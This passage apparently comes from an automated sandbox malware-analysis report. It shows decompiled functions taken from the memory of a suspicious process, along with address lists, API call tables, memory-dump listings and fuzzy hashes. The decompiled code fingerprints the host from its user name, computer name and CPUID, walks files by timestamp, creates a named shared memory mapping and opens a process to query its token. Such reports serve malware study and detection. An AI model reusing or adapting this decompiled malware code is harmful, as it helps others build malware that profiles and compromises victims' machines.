                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							if(_t128 < 0x30) {
                                                                                                                                                                                                                        								 *_t141 = _t128 + 0x20;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t141 = _t141 + 1;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_v12 = 1;
                                                                                                                                                                                                                        						FindClose(_v16); // executed
                                                                                                                                                                                                                        						_t146 = 0;
                                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t165 = _t140 - _t109;
                                                                                                                                                                                                                        					L15:
                                                                                                                                                                                                                        					if(_t165 == 0 || _v12 == _v32) {
                                                                                                                                                                                                                        						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                                                                                                                                                        						_t139 = _v40;
                                                                                                                                                                                                                        						_t151 = _t111 -  &(_v368.cFileName);
                                                                                                                                                                                                                        						_t113 = 0;
                                                                                                                                                                                                                        						if(_t139 != 0) {
                                                                                                                                                                                                                        							_t48 = _t151 - 4; // -4
                                                                                                                                                                                                                        							_t113 = _t48;
                                                                                                                                                                                                                        							if(_t113 > _t151) {
                                                                                                                                                                                                                        								_t113 = 0;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_t151 > 4) {
                                                                                                                                                                                                                        							_t151 = 4;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                                                                                                                                                        						_t154 = _t154 + 0xc;
                                                                                                                                                                                                                        						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                        						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                        						if(_t119 == 0) {
                                                                                                                                                                                                                        							FindClose(_v16);
                                                                                                                                                                                                                        							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                                                        					_v12 = _v12 + 1;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}











































                                                                                                                                                                                                                        0x026f5244
                                                                                                                                                                                                                        0x026f524a
                                                                                                                                                                                                                        0x026f524c
                                                                                                                                                                                                                        0x026f5266
                                                                                                                                                                                                                        0x026f5268
                                                                                                                                                                                                                        0x026f526d
                                                                                                                                                                                                                        0x026f54e2
                                                                                                                                                                                                                        0x026f54e9
                                                                                                                                                                                                                        0x026f54e9
                                                                                                                                                                                                                        0x026f5273
                                                                                                                                                                                                                        0x026f5288
                                                                                                                                                                                                                        0x026f528a
                                                                                                                                                                                                                        0x026f528c
                                                                                                                                                                                                                        0x026f5291
                                                                                                                                                                                                                        0x026f54d2
                                                                                                                                                                                                                        0x026f54dc
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f54dc
                                                                                                                                                                                                                        0x026f5297
                                                                                                                                                                                                                        0x026f52a2
                                                                                                                                                                                                                        0x026f52a7
                                                                                                                                                                                                                        0x026f52ac
                                                                                                                                                                                                                        0x026f52af
                                                                                                                                                                                                                        0x026f52b6
                                                                                                                                                                                                                        0x026f52bb
                                                                                                                                                                                                                        0x026f52c0
                                                                                                                                                                                                                        0x026f54c2
                                                                                                                                                                                                                        0x026f54cc
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f54cc
                                                                                                                                                                                                                        0x026f52d6
                                                                                                                                                                                                                        0x026f52da
                                                                                                                                                                                                                        0x026f52dd
                                                                                                                                                                                                                        0x026f52e0
                                                                                                                                                                                                                        0x026f52e6
                                                                                                                                                                                                                        0x026f52eb
                                                                                                                                                                                                                        0x026f52f4
                                                                                                                                                                                                                        0x026f52fa
                                                                                                                                                                                                                        0x026f5304
                                                                                                                                                                                                                        0x026f530b
                                                                                                                                                                                                                        0x026f530b
                                                                                                                                                                                                                        0x026f531d
                                                                                                                                                                                                                        0x026f5328
                                                                                                                                                                                                                        0x026f5336
                                                                                                                                                                                                                        0x026f533b
                                                                                                                                                                                                                        0x026f5340
                                                                                                                                                                                                                        0x026f5343
                                                                                                                                                                                                                        0x026f5348
                                                                                                                                                                                                                        0x026f5352
                                                                                                                                                                                                                        0x026f5355
                                                                                                                                                                                                                        0x026f5358
                                                                                                                                                                                                                        0x026f536e
                                                                                                                                                                                                                        0x026f5370
                                                                                                                                                                                                                        0x026f5375
                                                                                                                                                                                                                        0x026f54c0
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f54c0
                                                                                                                                                                                                                        0x026f538c
                                                                                                                                                                                                                        0x026f53dd
                                                                                                                                                                                                                        0x026f53a0
                                                                                                                                                                                                                        0x026f53a8
                                                                                                                                                                                                                        0x026f53ad
                                                                                                                                                                                                                        0x026f53bb
                                                                                                                                                                                                                        0x026f53c4
                                                                                                                                                                                                                        0x026f53cd
                                                                                                                                                                                                                        0x026f53cd
                                                                                                                                                                                                                        0x026f53db
                                                                                                                                                                                                                        0x026f53db
                                                                                                                                                                                                                        0x026f53e1
                                                                                                                                                                                                                        0x026f53e5
                                                                                                                                                                                                                        0x026f53e5
                                                                                                                                                                                                                        0x026f53eb
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f53ed
                                                                                                                                                                                                                        0x026f53f3
                                                                                                                                                                                                                        0x026f549a
                                                                                                                                                                                                                        0x026f549d
                                                                                                                                                                                                                        0x026f54aa
                                                                                                                                                                                                                        0x026f54aa
                                                                                                                                                                                                                        0x026f54ae
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f54a3
                                                                                                                                                                                                                        0x026f54a7
                                                                                                                                                                                                                        0x026f54a7
                                                                                                                                                                                                                        0x026f54a9
                                                                                                                                                                                                                        0x026f54a9
                                                                                                                                                                                                                        0x026f54b3
                                                                                                                                                                                                                        0x026f54ba
                                                                                                                                                                                                                        0x026f54bc
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f54bc
                                                                                                                                                                                                                        0x026f53f9
                                                                                                                                                                                                                        0x026f53fb
                                                                                                                                                                                                                        0x026f53fb
                                                                                                                                                                                                                        0x026f540e
                                                                                                                                                                                                                        0x026f5414
                                                                                                                                                                                                                        0x026f541f
                                                                                                                                                                                                                        0x026f5421
                                                                                                                                                                                                                        0x026f5425
                                                                                                                                                                                                                        0x026f5427
                                                                                                                                                                                                                        0x026f5427
                                                                                                                                                                                                                        0x026f542c
                                                                                                                                                                                                                        0x026f542e
                                                                                                                                                                                                                        0x026f542e
                                                                                                                                                                                                                        0x026f542c
                                                                                                                                                                                                                        0x026f5433
                                                                                                                                                                                                                        0x026f5437
                                                                                                                                                                                                                        0x026f5437
                                                                                                                                                                                                                        0x026f5447
                                                                                                                                                                                                                        0x026f544c
                                                                                                                                                                                                                        0x026f544f
                                                                                                                                                                                                                        0x026f544f
                                                                                                                                                                                                                        0x026f5452
                                                                                                                                                                                                                        0x026f545c
                                                                                                                                                                                                                        0x026f5464
                                                                                                                                                                                                                        0x026f5469
                                                                                                                                                                                                                        0x026f5477
                                                                                                                                                                                                                        0x026f5477
                                                                                                                                                                                                                        0x026f548b
                                                                                                                                                                                                                        0x026f548f
                                                                                                                                                                                                                        0x026f548f

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 026F5266
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 026F5288
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F52A2
                                                                                                                                                                                                                          • Part of subcall function 026F67CF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,026F52BB,73797325), ref: 026F67E0
                                                                                                                                                                                                                          • Part of subcall function 026F67CF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 026F67FA
                                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 026F52E0
                                                                                                                                                                                                                        • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 026F52F4
                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 026F530B
                                                                                                                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 026F5317
                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,642E2A5C), ref: 026F5358
                                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?), ref: 026F536E
                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(?,?), ref: 026F538C
                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(026F857A,?), ref: 026F53A0
                                                                                                                                                                                                                        • FindClose.KERNEL32(026F857A), ref: 026F53AD
                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 026F53B9
                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(?,?), ref: 026F53DB
                                                                                                                                                                                                                        • StrChrA.SHLWAPI(?,0000002E), ref: 026F540E
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,?,00000000), ref: 026F5447
                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(026F857A,?), ref: 026F545C
                                                                                                                                                                                                                        • FindClose.KERNEL32(026F857A), ref: 026F5469
                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 026F5475
                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(?,?), ref: 026F5485
                                                                                                                                                                                                                        • FindClose.KERNELBASE(026F857A), ref: 026F54BA
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 026F54CC
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 026F54DC
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2944988578-0
                                                                                                                                                                                                                        • Opcode ID: fde11f4be730d02bbf3e5e08c8b8b438a0f9832e1000db2837628ae612fe5319
                                                                                                                                                                                                                        • Instruction ID: 3bae33d05b8b75e816a014afbbc4d1225c12fe6abe8d1f8a63218944ba510359
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fde11f4be730d02bbf3e5e08c8b8b438a0f9832e1000db2837628ae612fe5319
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8815B72D00209AFDF51DFA5DC84AEEBBB9FF44301F50046AE606E6250E7719A95CF60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                                                        			E02191006(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				struct _FILETIME* _v16;
                                                                                                                                                                                                                        				short _v60;
                                                                                                                                                                                                                        				struct _FILETIME* _t14;
                                                                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t31 = __edx;
                                                                                                                                                                                                                        				_t14 =  &_v16;
                                                                                                                                                                                                                        				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                        				_push(0x192);
                                                                                                                                                                                                                        				_push(0x54d38000);
                                                                                                                                                                                                                        				_push(_v12);
                                                                                                                                                                                                                        				_push(_v16);
                                                                                                                                                                                                                        				L02192180();
                                                                                                                                                                                                                        				_push(_t14);
                                                                                                                                                                                                                        				_v16 = _t14;
                                                                                                                                                                                                                        				_t15 =  *0x2194144;
                                                                                                                                                                                                                        				_push(_t15 + 0x219505e);
                                                                                                                                                                                                                        				_push(_t15 + 0x2195054);
                                                                                                                                                                                                                        				_push(0x16);
                                                                                                                                                                                                                        				_push( &_v60);
                                                                                                                                                                                                                        				_v12 = _t31;
                                                                                                                                                                                                                        				L0219217A();
                                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                                        				if(_t18 == 0) {
                                                                                                                                                                                                                        					_t18 = 0x1000;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t19 = CreateFileMappingW(0xffffffff, 0x2194148, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                        				_t34 = _t19;
                                                                                                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                                                                                                        					_t32 = GetLastError();
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                        						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                        						if(_t22 == 0) {
                                                                                                                                                                                                                        							_t32 = GetLastError();
                                                                                                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							 *_a8 = _t34;
                                                                                                                                                                                                                        							 *_a12 = _t22;
                                                                                                                                                                                                                        							_t32 = 0;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t32 = 2;
                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                        						CloseHandle(_t34);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t32;
                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                        0x02191006
                                                                                                                                                                                                                        0x0219100f
                                                                                                                                                                                                                        0x02191013
                                                                                                                                                                                                                        0x02191019
                                                                                                                                                                                                                        0x0219101e
                                                                                                                                                                                                                        0x02191023
                                                                                                                                                                                                                        0x02191026
                                                                                                                                                                                                                        0x02191029
                                                                                                                                                                                                                        0x0219102e
                                                                                                                                                                                                                        0x0219102f
                                                                                                                                                                                                                        0x02191032
                                                                                                                                                                                                                        0x0219103d
                                                                                                                                                                                                                        0x02191044
                                                                                                                                                                                                                        0x02191048
                                                                                                                                                                                                                        0x0219104a
                                                                                                                                                                                                                        0x0219104b
                                                                                                                                                                                                                        0x0219104e
                                                                                                                                                                                                                        0x02191053
                                                                                                                                                                                                                        0x0219105d
                                                                                                                                                                                                                        0x0219105f
                                                                                                                                                                                                                        0x0219105f
                                                                                                                                                                                                                        0x02191073
                                                                                                                                                                                                                        0x02191079
                                                                                                                                                                                                                        0x0219107d
                                                                                                                                                                                                                        0x021910cd
                                                                                                                                                                                                                        0x0219107f
                                                                                                                                                                                                                        0x02191088
                                                                                                                                                                                                                        0x0219109e
                                                                                                                                                                                                                        0x021910a6
                                                                                                                                                                                                                        0x021910b8
                                                                                                                                                                                                                        0x021910bc
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021910a8
                                                                                                                                                                                                                        0x021910ab
                                                                                                                                                                                                                        0x021910b0
                                                                                                                                                                                                                        0x021910b2
                                                                                                                                                                                                                        0x021910b2
                                                                                                                                                                                                                        0x02191093
                                                                                                                                                                                                                        0x02191095
                                                                                                                                                                                                                        0x021910be
                                                                                                                                                                                                                        0x021910bf
                                                                                                                                                                                                                        0x021910bf
                                                                                                                                                                                                                        0x02191088
                                                                                                                                                                                                                        0x021910d5

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,021912F9,0000000A,?,?), ref: 02191013
                                                                                                                                                                                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02191029
                                                                                                                                                                                                                        • _snwprintf.NTDLL ref: 0219104E
                                                                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,02194148,00000004,00000000,?,?), ref: 02191073
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,021912F9,0000000A,?), ref: 0219108A
                                                                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0219109E
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,021912F9,0000000A,?), ref: 021910B6
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,021912F9,0000000A), ref: 021910BF
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,021912F9,0000000A,?), ref: 021910C7
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1724014008-0
                                                                                                                                                                                                                        • Opcode ID: 61df438631e5e5403a2bbea303ca62f7cb724ef0ee7c6ce71217f3f70a4b029a
                                                                                                                                                                                                                        • Instruction ID: dc973791a1b7f54e04747e1c9b2ec7f1d336c414b1b5169c86b2994e5e98ff47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61df438631e5e5403a2bbea303ca62f7cb724ef0ee7c6ce71217f3f70a4b029a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F2103B2E80248BFDF10AFA4CC84EAE37E9EB44354F194125F619E7140D73199858B61
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                                        			E026F65CE(char __eax, void* __esi) {
                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                        				long _t34;
                                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                                        				long _t50;
                                                                                                                                                                                                                        				char _t59;
                                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                                                        				char _t65;
                                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t69 = __esi;
                                                                                                                                                                                                                        				_t65 = __eax;
                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                        				_v12 = __eax;
                                                                                                                                                                                                                        				if(__eax == 0) {
                                                                                                                                                                                                                        					_t59 =  *0x26fd270; // 0xd448b889
                                                                                                                                                                                                                        					_v12 = _t59;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t64 = _t69;
                                                                                                                                                                                                                        				E026F5043( &_v12, _t64);
                                                                                                                                                                                                                        				if(_t65 != 0) {
                                                                                                                                                                                                                        					 *_t69 =  *_t69 ^  *0x26fd2a0 ^ 0x76f6612d;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                        					_t50 = _v8;
                                                                                                                                                                                                                        					if(_t50 != 0) {
                                                                                                                                                                                                                        						_t62 = RtlAllocateHeap( *0x26fd238, 0, _t50 + _t50);
                                                                                                                                                                                                                        						if(_t62 != 0) {
                                                                                                                                                                                                                        							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                        								_t64 = _t62;
                                                                                                                                                                                                                        								 *_t69 =  *_t69 ^ E026F3769(_v8 + _v8, _t64);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							HeapFree( *0x26fd238, 0, _t62);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t61 = __imp__;
                                                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                        				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                        				_t34 = _v8;
                                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                                        					_t68 = RtlAllocateHeap( *0x26fd238, 0, _t34 + _t34);
                                                                                                                                                                                                                        					if(_t68 != 0) {
                                                                                                                                                                                                                        						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                        							_t64 = _t68;
                                                                                                                                                                                                                        							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E026F3769(_v8 + _v8, _t64);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						HeapFree( *0x26fd238, 0, _t68);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				asm("cpuid");
                                                                                                                                                                                                                        				_t67 =  &_v28;
                                                                                                                                                                                                                        				 *_t67 = 1;
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                                                        				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                        				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                        				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                                                        				return _t39;
                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                        0x026f65ce
                                                                                                                                                                                                                        0x026f65d6
                                                                                                                                                                                                                        0x026f65da
                                                                                                                                                                                                                        0x026f65dd
                                                                                                                                                                                                                        0x026f65e2
                                                                                                                                                                                                                        0x026f65e4
                                                                                                                                                                                                                        0x026f65e9
                                                                                                                                                                                                                        0x026f65e9
                                                                                                                                                                                                                        0x026f65ef
                                                                                                                                                                                                                        0x026f65f1
                                                                                                                                                                                                                        0x026f65fe
                                                                                                                                                                                                                        0x026f665f
                                                                                                                                                                                                                        0x026f6600
                                                                                                                                                                                                                        0x026f6605
                                                                                                                                                                                                                        0x026f660b
                                                                                                                                                                                                                        0x026f6610
                                                                                                                                                                                                                        0x026f661e
                                                                                                                                                                                                                        0x026f6622
                                                                                                                                                                                                                        0x026f6631
                                                                                                                                                                                                                        0x026f6638
                                                                                                                                                                                                                        0x026f663f
                                                                                                                                                                                                                        0x026f663f
                                                                                                                                                                                                                        0x026f664a
                                                                                                                                                                                                                        0x026f664a
                                                                                                                                                                                                                        0x026f6622
                                                                                                                                                                                                                        0x026f6610
                                                                                                                                                                                                                        0x026f6661
                                                                                                                                                                                                                        0x026f6667
                                                                                                                                                                                                                        0x026f6671
                                                                                                                                                                                                                        0x026f6673
                                                                                                                                                                                                                        0x026f6678
                                                                                                                                                                                                                        0x026f6687
                                                                                                                                                                                                                        0x026f668b
                                                                                                                                                                                                                        0x026f6696
                                                                                                                                                                                                                        0x026f669d
                                                                                                                                                                                                                        0x026f66a4
                                                                                                                                                                                                                        0x026f66a4
                                                                                                                                                                                                                        0x026f66b0
                                                                                                                                                                                                                        0x026f66b0
                                                                                                                                                                                                                        0x026f668b
                                                                                                                                                                                                                        0x026f66bb
                                                                                                                                                                                                                        0x026f66bd
                                                                                                                                                                                                                        0x026f66c0
                                                                                                                                                                                                                        0x026f66c2
                                                                                                                                                                                                                        0x026f66c5
                                                                                                                                                                                                                        0x026f66c8
                                                                                                                                                                                                                        0x026f66d2
                                                                                                                                                                                                                        0x026f66d6
                                                                                                                                                                                                                        0x026f66da

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 026F6605
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 026F661C
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 026F6629
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 026F664A
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 026F6671
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 026F6685
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 026F6692
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 026F66B0
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3239747167-0
                                                                                                                                                                                                                        • Opcode ID: 2062de7a33ace5274691dff449ef7e0e106f3ec218f42f2b2ee1657fc7229235
                                                                                                                                                                                                                        • Instruction ID: 2c389e88f52104775376f05fe4e3fdc7d2f9a81ceb98244cedb6a7fed008b324
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2062de7a33ace5274691dff449ef7e0e106f3ec218f42f2b2ee1657fc7229235
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59312872A00209EFDF50DF69DD81A6EF7FDEF48304B214469E615D7210DB31EA619B50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                                                                                        			E026F6066(char _a4, void* _a8) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                                        				void** _t33;
                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                                        				void** _t44;
                                                                                                                                                                                                                        				intOrPtr* _t47;
                                                                                                                                                                                                                        				char _t48;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				_v20 = _a4;
                                                                                                                                                                                                                        				_t48 = 0;
                                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                                        				_a4 = 0;
                                                                                                                                                                                                                        				_v44 = 0x18;
                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                                        				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                        					_t33 =  &_v8;
                                                                                                                                                                                                                        					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                        					if(_t33 >= 0) {
                                                                                                                                                                                                                        						_t47 = __imp__;
                                                                                                                                                                                                                        						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                        						_t44 = E026F6D10(_a4);
                                                                                                                                                                                                                        						if(_t44 != 0) {
                                                                                                                                                                                                                        							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                        							if(_t40 >= 0) {
                                                                                                                                                                                                                        								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                        								_t48 = 1;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							E026F45B3(_t44);
                                                                                                                                                                                                                        						}
